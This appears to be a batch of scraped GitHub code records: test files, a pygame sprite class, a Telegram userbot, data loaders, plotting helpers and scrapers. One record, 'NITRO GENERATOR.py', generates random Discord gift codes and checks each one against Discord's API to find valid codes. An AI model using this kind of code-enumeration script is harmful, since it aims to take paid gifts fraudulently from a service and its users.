\"rfp\"),\n (\"RFP_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"RFp_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"dsf/RfP_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"d34sf/rFp_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"dsf/YfP-Position01_time01.tif.out.tif\", \"yfp\"),\n (\"d34sf/YFP-Position01_time01.tif.out.tif\", \"yfp\"),\n ],\n)\ndef test_channels_rex(string, expected):\n assert ld.CHANNEL_REX.findall(string)[0][0].lower() == expected\n\n\n@pt.mark.parametrize(\n \"string,expected\",\n [\n (\"BF_Position1_t01.tif.out.tif\", [\"1\"]),\n (\"bF_Position01_time10.tif.out.tif\", [\"01\"]),\n (\"bf_P00001_time010.tif.out.tif\", [\"00001\"]),\n (\"dsf/position1e3_time01.tif.out.tif\", [\"1e3\"]),\n (\"d34sf/_Pos23e2+1.tif.out.tif\", [\"23e2+1\"]),\n (\"dsf/BF-Position23+12_time01.tif.out.tif\", [\"23\"]),\n (\"d34sf/BF-P01_time01.tif.out.tif\", [\"01\"]),\n (\"RFP_p01_time01.tif.out.tif\", [\"01\"]),\n (\"RFP/Pdasasfaf$sasd01_time01.tif.out.tif\", []),\n ],\n)\ndef test_position_rex(string, expected):\n assert ld.POSITION_REX.findall(string) == expected\n\n\n# =============================================================================\n# test: transpose tables and add fluorescence values\n# =============================================================================\n\n\ndef test_make_cols_cahnnels(create_out_all_file_min, create_mapping_file_min):\n \"\"\"\n Variables starting with f_ (f_vacuole) are disaggregated by channel\n f_vacuole_yfp f_vacuole_tfp f_vacuole_rfp f_vacuole_tfp f_vacuole_bf\n \"\"\"\n df_out_all = ld.read_df(create_out_all_file_min)\n df_mapp = ld.read_df(create_mapping_file_min)\n\n df_pycellid = ld._make_cols_chan(df_out_all, df_mapp)\n\n par = [np.nan if i % 2 == 0 else i * 50 for i in range(1, 11)]\n impar = [i * 50 if i % 2 == 0 else np.nan for i in range(1, 11)]\n\n df = pd.DataFrame(\n {\n \"area\": np.linspace(200, 1000, 10, dtype=int),\n \"f_nuc_bf\": par,\n \"f_nuc_yfp\": impar,\n \"f_tot_bf\": par,\n \"f_tot_yfp\": impar,\n \"f_vac_bf\": par,\n \"f_vac_yfp\": impar,\n \"flag\": [0 if i % 2 == 0 else 1 for i in range(1, 11)],\n \"cellID\": np.linspace(100, 400, 10, endpoint=True, dtype=int),\n \"ucid\": np.linspace(100, 400, 10, endpoint=True, dtype=int)\n + 100000000000,\n \"t_frame\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n \"pos\": np.ones(10, dtype=int),\n }\n )\n assert len(df_pycellid.columns) == len(df.columns)\n\n\n# =============================================================================\n# test merge table\n# =============================================================================\n\n\ndef test_merge_tables():\n # these are synthetic values ​​for test\n path = os.path.join(base, \"tests\", \"pydata\", \"test\")\n synthetic = ld.merge_tables(path=path).copy()\n\n ch_crtl = [\n \"f_tot_yfp\",\n \"f_tot_cfp\",\n \"f_tot_tfp\",\n \"f_local_bg_yfp\",\n \"f_local_bg_cfp\",\n \"f_local_bg_tfp\",\n \"f_nucl_yfp\",\n \"f_nucl_cfp\",\n \"f_nucl_tfp\",\n ]\n\n ucid_crtl = {\n 1100000000001,\n 1100000000002,\n 2200000000001,\n 2200000000002,\n 3300000000001,\n 3300000000002,\n }\n\n ch_var = []\n\n for name in synthetic.columns:\n assert \".\" not in name\n assert \" \" not in name[0]\n assert \" \" not in name[-1]\n if name.startswith(\"f_\"):\n ch_var.append(name)\n\n assert ch_var == ch_crtl\n assert set(synthetic[\"pos\"]) == {11, 22, 33}\n assert set(synthetic[\"ucid\"]) == ucid_crtl\n\n\n# =============================================================================\n# To build controls\n# =============================================================================\n\n# %%\n\n# Synthetic data for control.\n# Simulation: acquisition of 3 fluorescent channels, 4 time-lapse in 3\n# positions and measurement of 2 cells per image.\n# Minimum tree of files (metadata and measurements) returned by CellID.\n\n# rs = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))\n\n# folder_test = os.path.join(base, \"tests\", \"pydata\", \"test\")\n# folder = [\"Pos0011\", \"Position02e1+2\", \"p33\"]\n# ch = [\"YFP\", \"CFP\", \"TFP\"]\n# m = []\n# oa = []\n# for f in folder:\n# path = os.path.join(folder_test, f)\n# os.mkdir(path)\n\n# img = [os.path.join(folder_test, f'{c}_{f}_time{t}.tif')\n# for c in ch for t in range(1,5)]\n\n# img_bf = [os.path.join(folder_test, f'BF_{f}_time{t}.tif')\n# for t in range(1,5)]\n\n# meta_data = pd.DataFrame(\n# {\n# 'fluor' : img,\n# 'flag' : np.repeat(np.linspace(0, 2, 3, dtype=int), 4),\n# 't.frame' : np.repeat(np.linspace(0, 2, 3, dtype=int), 4),\n# 'bright' : img_bf * 3,\n# 'bf.as.fl' : np.zeros(12, dtype=int),\n# }\n# )\n# meta_data.to_csv(\n# path_or_buf= os.path.join(folder_test, f, \"out_bf_fl_mapping\"),\n# sep=\"\\t\",\n# index=False,\n# )\n# m.append(meta_data)\n\n# df_crl = pd.DataFrame(\n# {\n# 'cellID ' : np.repeat(np.linspace(1, 2, 2, dtype=int), 12),\n# 't.frame' : list(np.repeat(np.linspace(0, 3, 4, dtype=int), 3))*2,\n# ' flag ' : [0,1,2] * 8,\n# ' f.tot ' : rs.rand(24),\n# ' f.local.bg ': rs.rand(24)*256,\n# ' f.nucl ': rs.rand(24)*256,\n# }\n# )\n# df_crl.to_csv(\n# path_or_buf= os.path.join(folder_test, f, \"out_all\"),\n# sep=\"\\t\",\n# index=False,\n# )\n# oa.append(df_crl)\n","repo_name":"pyCellID/pyCellID","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":10624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"40683103401","text":"import pygame\r\nimport math\r\nfrom settings import *\r\nfrom map import walls_collision\r\nfrom Guns import Gun\r\n\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self, *groups, imr, iml, weapon, all_sprites, player_pos, collisions):\r\n super().__init__(*groups)\r\n\r\n self.fire = False\r\n self.x, self.y = player_pos\r\n self.angle = player_angle\r\n self.lives = player_lives\r\n self.m_lives = player_lives\r\n\r\n # animation\r\n self.animation = {}\r\n for step, anim in enumerate(imr[:]):\r\n self.animation['r_' + str(step)] = \\\r\n pygame.transform.scale(anim,\r\n (anim.get_width() * 80 // TILE, anim.get_height() * 80 // TILE))\r\n for step, anim in enumerate(iml[:]):\r\n self.animation['l_' + str(step)] = \\\r\n pygame.transform.scale(anim,\r\n (anim.get_width() * 80 // TILE, anim.get_height() * 80 // TILE))\r\n\r\n self.anim_step = 0\r\n self.anim_turn = 'r_'\r\n self.max_steps = len(imr) // 2 * player_speed\r\n\r\n # rect and im\r\n self.image = pygame.transform.scale(imr[0],\r\n (imr[0].get_width() * 80 // TILE, imr[0].get_height() * 80 // TILE))\r\n self.rect = pygame.rect.Rect(self.x, self.y, self.image.get_width(), self.image.get_height() // 2)\r\n self.rect.center = player_pos\r\n\r\n # rect for world collision\r\n self.w_rect = pygame.rect.Rect(self.x, self.y, self.image.get_width(), self.image.get_height() // 2)\r\n self.w_rect.center = player_pos\r\n\r\n walls_collision.append(self.w_rect)\r\n\r\n self.all_sprites = all_sprites\r\n self.weapon = Gun(weapon[0], weapon[1], all_sprites, player=self)\r\n\r\n @property\r\n def pos(self):\r\n return (self.x, self.y)\r\n\r\n @property\r\n def bullet_name(self):\r\n return 'bullet.png'\r\n\r\n @property\r\n def turn(self):\r\n return 'player'\r\n\r\n def is_empty(self, dx, dy):\r\n next_rect = self.w_rect.move(dx, dy)\r\n hit_indexes = next_rect.collidelistall(walls_collision)\r\n\r\n if len(hit_indexes) > 1:\r\n delta_x, delta_y = 0, 0\r\n for hit_index in hit_indexes:\r\n hit_rect = walls_collision[hit_index]\r\n if hit_rect != self.w_rect:\r\n if dx > 0:\r\n delta_x += next_rect.right - hit_rect.left\r\n else:\r\n delta_x += hit_rect.right - next_rect.left\r\n if dy > 0:\r\n delta_y += next_rect.bottom - hit_rect.top\r\n else:\r\n delta_y += hit_rect.bottom - next_rect.top\r\n\r\n if abs(delta_x - delta_y) < 10:\r\n dx, dy = 0, 0\r\n elif delta_x > delta_y:\r\n dy = 0\r\n elif delta_y > delta_x:\r\n dx = 0\r\n self.rect.x += dx\r\n self.rect.y += dy\r\n self.x += dx\r\n self.y += dy\r\n\r\n def movement(self):\r\n keys = pygame.key.get_pressed()\r\n step = self.anim_step\r\n if keys[pygame.K_w]:\r\n self.is_empty(0, -player_speed)\r\n step += 1\r\n if keys[pygame.K_s]:\r\n self.is_empty(0, player_speed)\r\n step += 1\r\n if keys[pygame.K_a]:\r\n self.is_empty(-player_speed, 0)\r\n step += 1\r\n if keys[pygame.K_d]:\r\n self.is_empty(player_speed, 0)\r\n step += 1\r\n\r\n self.w_rect.center = self.x, self.y\r\n\r\n if step != self.anim_step:\r\n self.anim_step = self.anim_step + 1\r\n else:\r\n self.anim_step = 0\r\n\r\n self.do_animation()\r\n \r\n if pygame.mouse.get_focused():\r\n x2, y2 = pygame.mouse.get_pos()\r\n x1, y1 = self.rect.x, self.rect.y\r\n h = y2 - y1\r\n w = x2 - x1\r\n t = math.atan2(h, w)\r\n self.angle = t\r\n if x2 <= HALF_WIDTH:\r\n self.anim_turn = 'l_'\r\n else:\r\n self.anim_turn = 'r_'\r\n\r\n def do_animation(self):\r\n self.image = self.animation[self.anim_turn + str(self.anim_step // 10)]\r\n if self.anim_step // 10 == self.max_steps:\r\n self.anim_step = 0\r\n\r\n def move(self, dx, dy):\r\n self.rect.x += dx\r\n self.rect.y += dy\r\n\r\n def start_fire(self):\r\n self.fire = True\r\n\r\n def stop_fire(self):\r\n self.fire = False\r\n\r\n def hit(self, *args, **kwarks):\r\n if args[0] == 'monster':\r\n self.lives -= args[1]\r\n if not self.is_live:\r\n self.dead()\r\n return True\r\n return False\r\n\r\n def dead(self):\r\n pass\r\n\r\n @property\r\n def is_live(self):\r\n if self.lives > 0:\r\n return True\r\n return False\r\n\r\n def update(self):\r\n self.movement()\r\n if self.fire:\r\n self.weapon.fire()\r\n\r\n def get_weapon(self, weapon):\r\n self.weapon = weapon\r\n","repo_name":"IAmJustFish/Dungeons","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27871443000","text":"from collections import defaultdict\nfrom os.path import join\n\nfrom core.conf import conf\nfrom core.storage.main import storage\nfrom libs.utils.io import write\n\n\ndef update_langs():\n all_articles = defaultdict(list)\n without_redirects = defaultdict(list)\n # for title, page in storage.iterate_pages_with_info(silent=True):\n for title, page in storage.iterate_pages(silent=True):\n for lang in page.languages.keys:\n all_articles[lang].append(title)\n # if not page.is_redirect:\n if title not in storage.redirects_set:\n without_redirects[lang].append(title)\n\n path = join(conf.PARSED_STORAGE_PATH, 'lists', 'langs')\n for lang, titles in all_articles.items():\n write(f'{path}/{lang or \"-\"}.txt', '\\n'.join(titles))\n\n path = join(conf.PARSED_STORAGE_PATH, 'lists', 'langs', 'articles')\n for lang, titles in without_redirects.items():\n write(f'{path}/{lang or \"-\"}.txt', '\\n'.join(titles))\n\n print('ok')\n\n\nif __name__ == '__main__':\n update_langs()\n","repo_name":"2vitalik/wiktionary","sub_path":"projects/parsed/update_lists/update_langs.py","file_name":"update_langs.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"23478336922","text":"import sys\nimport config\nimport pyrogram\n\nfrom lolithabot import log\n\nclients = []\nassistant = []\n\nclass lolithaUserbot(pyrogram.Client):\n def __init__(self):\n ubot = self.__class__.__name__.lower()\n self.one = pyrogram.Client(\n name=ubot,\n api_id=config.API_ID,\n api_hash=config.API_HASH,\n session_string=config.SessionString,\n no_updates=True\n )\n self.second = pyrogram.Client(\n name=ubot,\n api_id=config.API_ID,\n api_hash=config.API_HASH,\n session_string=config.SessionString2,\n no_updates=True\n )\n\n async def start(self):\n log.info('Starting lolitha userbot...')\n if config.SessionString:\n await self.one.start()\n clients.append(1)\n try:\n await self.one.send_message(\n chat_id=config.log_chat,\n text=(\"✅ Assistant has been started.\")\n )\n except:\n log.error(\n \"Assistant account has failed to acces the log group.\"\n )\n sys.exit()\n \n client_id = (await self.one.get_me()).id\n assistant.append(client_id)\n log.info(\"lolitha userbot 1 has been started.\")\n\n if config.SessionString2:\n await self.second.start()\n clients.append(2)\n try:\n await self.second.send_message(\n chat_id=config.log_chat,\n text=\"✅ Assistant has been started.\" \n )\n except:\n log.error(\n \"Assistant 2 account has failed to acces the log group.\"\n )\n sys.exit()\n\n client_id = (await self.second.get_me()).id\n assistant.append(client_id)\n log.info(\"lolitha userbot 2 has been started.\") \n","repo_name":"mukeshmoni/lolita","sub_path":"lolita/lolita_client.py","file_name":"lolita_client.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20311155131","text":"import numpy as np\nimport scipy.io\nfrom torch.utils.data import Dataset\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nimport math\n\n\nclass Multi_view_data(Dataset):\n \"\"\"\n load multi-view data\n \"\"\"\n\n def __init__(self, root, train=True, Normal=1):\n \"\"\"\n :param root: data name and path\n :param train: load training set or test set\n :param noise: noise level in test set\n \"\"\"\n super(Multi_view_data, self).__init__()\n self.root = root\n self.train = train\n self.data_path = self.root + '.mat'\n self.data = scipy.io.loadmat(self.data_path)\n self.view_number = self.data['X'].shape[1]\n self.feature_per_view = []\n ratio = 0.8\n \n X = np.split(self.data['X'], self.view_number, axis=1)\n X_train = []\n X_test = []\n labels_train = []\n labels_test = []\n \n self.X_train_mean = {}\n self.X_train_std = {}\n \n if min(self.data['gt']) == 0:\n labels = self.data['gt'] + 1\n else:\n labels = self.data['gt']\n labels = self.data['gt']\n classes = max(labels)[0]+1\n self.classes = max(labels)[0]+1\n \n all_length = 0\n for c_num in range(classes):\n c_length = np.sum(labels == c_num)\n index = np.arange(c_length)\n #shuffle(index)\n labels_train.extend(labels[all_length + index][0:math.floor(c_length * ratio)])\n labels_test.extend(labels[all_length + index][math.floor(c_length * ratio):])\n X_train_temp = []\n X_test_temp = []\n for v_num in range(self.view_number):\n X_train_temp.append(X[v_num][0][0].transpose()[all_length + index][0:math.floor(c_length * ratio)])\n X_test_temp.append(X[v_num][0][0].transpose()[all_length + index][math.floor(c_length * ratio):])\n if c_num == 0:\n X_train = X_train_temp;\n X_test = X_test_temp\n else:\n for v_num in range(self.view_number):\n X_train[v_num] = np.r_[X_train[v_num], X_train_temp[v_num]]\n X_test[v_num] = np.r_[X_test[v_num], X_test_temp[v_num]]\n all_length = all_length + c_length\n if (Normal == 1):\n sign = 0\n if self.root.endswith(\"animal\"):\n sign = 1\n if self.root.endswith(\"yaleB\"):\n sign = 2\n if self.root.endswith(\"nyud2\"):\n sign = 2\n for v_num in range(self.view_number):\n X_train[v_num] = Normalize(X_train[v_num], sign)\n X_test[v_num] = Normalize(X_test[v_num], sign)\n \n \n \n if self.train:\n self.X = X_train\n self.y = labels_train\n else:\n self.X = X_test\n self.y = labels_test\n \n for v in range(self.view_number):\n self.feature_per_view.append(self.X[v].shape[1])\n \n \n\n def __getitem__(self, index):\n data = dict()\n d = []\n for v_num in range(len(self.X)):\n data[v_num] = (self.X[v_num][index]).astype(np.float32)\n d.append((self.X[v_num][index]).astype(np.float32))\n target = self.y[index]\n batch_size = len(target)\n view_num = len(self.X)\n \n full_data = np.concatenate(d, axis=0)\n target = target.squeeze()\n \n return full_data, target\n\n def __len__(self):\n return len(self.X[0])\n\n\ndef Normalize(x, min=0):\n if min == 0:\n #scaler = StandardScaler(with_mean=False,with_std=False)\n scaler = StandardScaler()\n elif min ==1:\n scaler = StandardScaler(with_mean=False,with_std=False)\n elif min ==2:\n scaler = StandardScaler(with_mean=False)\n else:\n print('error')\n exit()\n \n norm_x = scaler.fit_transform(x)\n \n return norm_x","repo_name":"QingyangZhang/CML","sub_path":"miwae/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"33"} +{"seq_id":"24714666302","text":"from pathlib import Path\nfrom typing import Union, Optional\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker\nimport numpy as np\nfrom matplotlib.image import AxesImage\nfrom numpy import ma\n\nfrom hima.common.utils import ensure_list, safe_ith\nfrom hima.envs.biogwlab.move_dynamics import DIRECTIONS_ORDER\n\n\ndef plot_grid_images(\n images: Union[np.ndarray, list[np.ndarray]],\n titles: Union[str, list[str]] = None,\n show: bool = True,\n save_path: Optional[Path] = None,\n with_value_text_flags: list[bool] = None,\n cols_per_row: int = 5\n):\n images = ensure_list(images)\n titles = ensure_list(titles)\n n_images = len(images)\n\n n_rows = (n_images - 1) // cols_per_row + 1\n n_cols = min(n_images, cols_per_row)\n\n fig, axes = plt.subplots(\n n_rows, n_cols,\n figsize=(5 * n_cols, 5 * n_rows)\n )\n if n_images == 1:\n axes = [axes]\n\n for i in range(n_images):\n ax = axes[i] if n_images <= cols_per_row else axes[i//cols_per_row][i%cols_per_row]\n img = images[i]\n title = safe_ith(titles, i)\n with_value_text = safe_ith(with_value_text_flags, i)\n _plot_grid_image(ax, img, title=title, with_value_text=with_value_text)\n\n fig.tight_layout()\n\n if show:\n plt.show()\n\n if save_path is not None:\n fig.savefig(save_path, dpi=120)\n plt.close('all')\n\n\ndef store_environment_map(\n map_ind: int, env_map: Union[np.ndarray, list[np.ndarray]],\n env_name: str, env_seed: int, test_dir: Path\n):\n env_map = ensure_list(env_map)\n titles = [f'{env_name}, seed={env_seed}']\n if len(env_map) > 1:\n titles.append('agent observation')\n\n save_path = test_dir.joinpath(f'map_{env_name}_{map_ind}_{env_seed}.svg')\n plot_grid_images(env_map, titles, show=False, save_path=save_path)\n\n\ndef plot_regular_plot(ax, data: np.ndarray):\n ax.plot(np.arange(data.size), data)\n\n\ndef _plot_grid_image(\n ax, data: np.ndarray, title: Optional[str] = None,\n with_value_text: bool = False\n):\n if title is not None:\n ax.set_title(title)\n ax.xaxis.tick_top()\n\n if data.ndim == 3 and data.shape[2] == 4:\n plot_triangled(ax, data)\n return\n if data.ndim == 1:\n plot_regular_plot(ax, data)\n return\n\n h, w = data.shape[:2]\n # labels: major\n ax.set_xticks(np.arange(w + 1))\n ax.set_yticks(np.arange(h + 1))\n ax.set_xticklabels(np.arange(w+1))\n ax.set_yticklabels(np.arange(h+1))\n # grid: minor\n ax.set_xticks(np.arange(w + 1) - .5, minor=True)\n ax.set_yticks(np.arange(h + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color='grey', linestyle='-', linewidth=.5)\n\n threshold = .03 if data.dtype == float else 2\n im = ax.imshow(\n data,\n norm=mpl.colors.SymLogNorm(linthresh=threshold, base=10)\n )\n if with_value_text and h * w <= 200:\n valfmt = '{x:.1f}' if data.dtype == float else '{x}'\n annotate_heatmap(im, data=data, valfmt=valfmt)\n\n\ndef plot_triangled(ax, data: np.ndarray):\n h, w = data.shape[:2]\n x = np.linspace(0, w, 2 * w + 1) - .5\n y = np.linspace(0, h, 2 * h + 1) - .5\n # noinspection PyTypeChecker\n points: tuple[np.ndarray, np.ndarray] = np.meshgrid(x, y)\n pxs, pys = points[0].ravel(), points[1].ravel()\n\n x_data, y_data = [], []\n for y_shit in range(h):\n for x_shift in range(w):\n up_x = 0, 1, 2\n up_y = 0, 1, 0\n\n down_x = 0, 1, 2\n down_y = 2, 1, 2\n\n left_x = 0, 1, 0\n left_y = 0, 1, 2\n\n right_x = 2, 1, 2\n right_y = 0, 1, 2\n\n assert DIRECTIONS_ORDER[0] == 'right'\n ixs = np.vstack((right_x, down_x, left_x, up_x)) + 2 * x_shift\n iys = np.vstack((right_y, down_y, left_y, up_y)) + 2 * y_shit\n x_data.append(ixs)\n y_data.append(iys)\n\n ixs = np.vstack(x_data)\n iys = np.vstack(y_data)\n ips = np.ravel_multi_index([iys, ixs], dims=points[0].shape)\n\n # labels: major\n ax.set_xticks(np.arange(w + 1))\n ax.set_yticks(np.arange(h + 1))\n ax.set_xticklabels(np.arange(w+1))\n ax.set_yticklabels(np.arange(h+1))\n # ax.grid(color='grey', linestyle='-', linewidth=2.)\n # grid: minor\n ax.set_xticks(np.arange(w + 1) - .5, minor=True)\n ax.set_yticks(np.arange(h + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color='grey', linestyle='-', linewidth=.5)\n ax.margins(x=0, y=0)\n ax.tripcolor(pxs, pys, ips, data.ravel())\n ax.invert_yaxis()\n\n\ndef annotate_heatmap(\n im: AxesImage, data: np.ndarray = None, valfmt=\"{x:.2f}\",\n textcolors=(\"white\", \"black\"), threshold=None, **textkw\n):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A pair of colors. The first is used for values below a threshold,\n the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max())/2.\n\n # Set default alignment to center, but allow it to be overwritten by textkw.\n kw = dict(horizontalalignment=\"center\", verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = mpl.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n if isinstance(data, ma.MaskedArray) and data.mask[i, j]:\n continue\n over_threshold = im.norm(data[i, j]) > threshold\n kw.update(color=textcolors[int(over_threshold)])\n im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n\n\ndef transform_fig_to_image(fig):\n fig.canvas.draw()\n img = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n return img\n","repo_name":"AIRI-Institute/him-agent","sub_path":"hima/common/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"33"} +{"seq_id":"5029488229","text":"to_decipher = [ch for ch in input()]\n\ncommand = ''\n\nwhile command != 'Abracadabra':\n command = input()\n if command == 'Abracadabra':\n continue\n if 'Abjuration' in command:\n for idx, chr in enumerate(to_decipher):\n to_decipher[idx] = chr.upper()\n print(''.join(to_decipher))\n elif 'Necromancy' in command:\n for idx, chrr in enumerate(to_decipher):\n to_decipher[idx] = chrr.lower()\n print(''.join(to_decipher))\n elif 'Illusion' in command:\n command, index, letter = command.split()\n if int(index) > len(to_decipher) - 1 or int(index) < 0:\n print(\"The spell was too weak.\")\n else:\n to_decipher[int(index)] = letter\n print(\"Done!\")\n elif 'Divination' in command:\n command, first_sub, second_sub = command.split()\n joined_string = ''.join(to_decipher)\n if first_sub not in joined_string:\n continue\n else:\n new_string = joined_string.replace(first_sub, second_sub)\n to_decipher = [chr_ for chr_ in new_string]\n print(''.join(to_decipher))\n elif 'Alteration' in command:\n command, sub_string = command.split()\n joined_string = ''.join(to_decipher)\n if sub_string not in joined_string:\n print(\"The spell did not work!\")\n else:\n new_string = joined_string.replace(sub_string, '')\n to_decipher = [char for char in new_string]\n print(''.join(to_decipher))\n else:\n print(\"The spell did not work!\")\n","repo_name":"tsvtln/SoftUniFundamentals","sub_path":"final_exam/01_task.py","file_name":"01_task.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"5547563495","text":"import os\nimport requests\nimport json\n\n\napi_key = os.environ['API_KEY']\napi_path = 'https://codeplexarchive-search.search.windows.net/indexes/codeplexarchive-index/docs'\ntop = 10000000\n\nparams = {\n 'api-version': '2016-09-01',\n 'api-key': api_key,\n '$top': top,\n 'highlight': 'Title',\n 'search': '*'\n}\nnext_link = ''\nprojects = []\n\nwhile True:\n try:\n if not next_link:\n response = requests.get(api_path, params=params)\n else:\n response = requests.get(next_link)\n \n response_json = response.json()\n\n results = response_json['value']\n for project in results:\n print(project['ProjectName'])\n projects.append(project)\n\n next_link = response_json['@odata.nextLink']\n\n except Exception as e:\n print(e, \"- I guess we're done for now.\")\n with open('projects.json', 'w') as projects_file:\n json.dump(projects, projects_file)\n break","repo_name":"zaafonin/CodeplexScraper","sub_path":"retrieve_list.py","file_name":"retrieve_list.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"21711598643","text":"import random, string\r\nimport requests\r\nimport os\r\nfrom colorama import Fore\r\n\r\n\r\n\r\n\r\n\r\n(\"[!]nitro - https://discord.nitro/gifted/valid\")\r\n\r\n\r\n\r\n\r\n\r\nfrom time import sleep\r\nimport sys\r\n\r\nline_1 = \"[#]Discord Nitro Generator by Hackage\"\r\nfor x in line_1:\r\n print(x, end='')\r\n sys.stdout.flush()\r\n sleep(0.1)\r\n\r\nnum = input(f' [?] Amount of discord nitro:')\r\n\r\nf = open(\"codes.txt\", \"a+\", encoding='utf-8')\r\n\r\nprint(\"\")\r\n\r\nfor n in range(int(num)):\r\n y = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(16))\r\n f.write('https://discord.gift/')\r\n f.write(y)\r\n f.write(\"\\n\")\r\n\r\nf.close()\r\n\r\nprint(f\"{Fore.LIGHTYELLOW_EX}[>] Generated {num} nitro codes and saved \\n[^]now going to check {num} nitro codes are valid or not! \")\r\n\r\nwith open(\"codes.txt\") as f:\r\n for line in f:\r\n nitro = line.strip(\"\\n\")\r\n\r\n url = \"https://discordapp.com/api/v6/entitlements/gift-codes/\" + nitro + \"?with_application=false&with_subscription_plan=true\"\r\n\r\n r = requests.get(url)\r\n\r\n if r.status_code == 200:\r\n print(\"{Fore.RED}wow\")\r\n print(\"[+]VALID CODE ┇ {} \".format(line.strip(\"\\n\")))\r\n else:\r\n print(\"[-]INVALID CODE ┇ {} \".format(line.strip(\"\\n\")))\r\n\r\nos.remove(\"Generatednitro.txt\")\r\n\r\nprint(f\"{Fore.LIGHTYELLOW_EX}\\nbye bye :) please give me a star \\n\")\r\n","repo_name":"HackageModz/Nitro-Generator","sub_path":"NITRO GENERATOR.py","file_name":"NITRO GENERATOR.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3178770916","text":"# https://leetcode-cn.com/problems/remove-duplicates-from-sorted-list-ii/\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n#快指针和慢指针\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n newhead = ListNode(-10000, head)\n slow = newhead\n while slow and slow.next:\n fast = slow.next\n while fast.next and fast.next.val == fast.val:\n fast = fast.next\n if fast != slow.next:\n slow.next = fast.next\n else:\n slow = slow.next\n return newhead.next\n\n\na = ListNode(1)\nb = ListNode(2)\nc = ListNode(3)\nd = ListNode(3)\ne = ListNode(4)\nf = ListNode(4)\ng = ListNode(5)\na.next = b\nb.next = c\nc.next = d\nd.next = e\ne.next = f\nf.next = g\nhead = Solution().deleteDuplicates(a)\nwhile head:\n print(head.val)\n head = head.next\n","repo_name":"Long-yuyao/python-trailing","sub_path":"data_structure/linked_list/remove_duplicated2.py","file_name":"remove_duplicated2.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7092946880","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef __mapping_table():\n\td = {\n\t\t\"\": \"||[u]||\",\n\t\t\"\": \"||[/u]||\",\n\t\t\"\": \"||[b]||\",\n\t\t\"\": \"||[/b]||\",\n\t\t\"\": \"||[i]||\",\n\t\t\"\": \"||[/i]||\",\n\t\t\"
